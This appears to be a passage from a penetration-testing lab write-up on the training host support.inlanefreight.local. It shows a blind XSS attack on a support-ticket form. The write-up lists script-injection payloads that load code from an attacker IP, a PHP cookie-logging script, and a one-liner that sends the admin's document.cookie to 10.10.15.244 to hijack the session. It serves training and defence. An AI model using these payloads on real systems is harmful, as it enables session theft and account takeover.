support.inlanefreight.local

Sending the request goes to some admin panel for approval.

If XSS exists then we can exploit it to perform session hijacking and log in as the admin.

After trying the following payloads in various fields of ticket submission this one worked:

<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

"><script src=http://10.10.15.244:8000/script.js></script>

I get a GET request to my python web server.

Now we just exploit it. Get the session, use cookie editor, get access to the dashboard.

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

new Image().src='http://10.10.15.244:8000/index.php?c='+document.cookie

Previousstatus.inlanefreight.local Nexttracking.inlanefreight.local

Last updated 10 months ago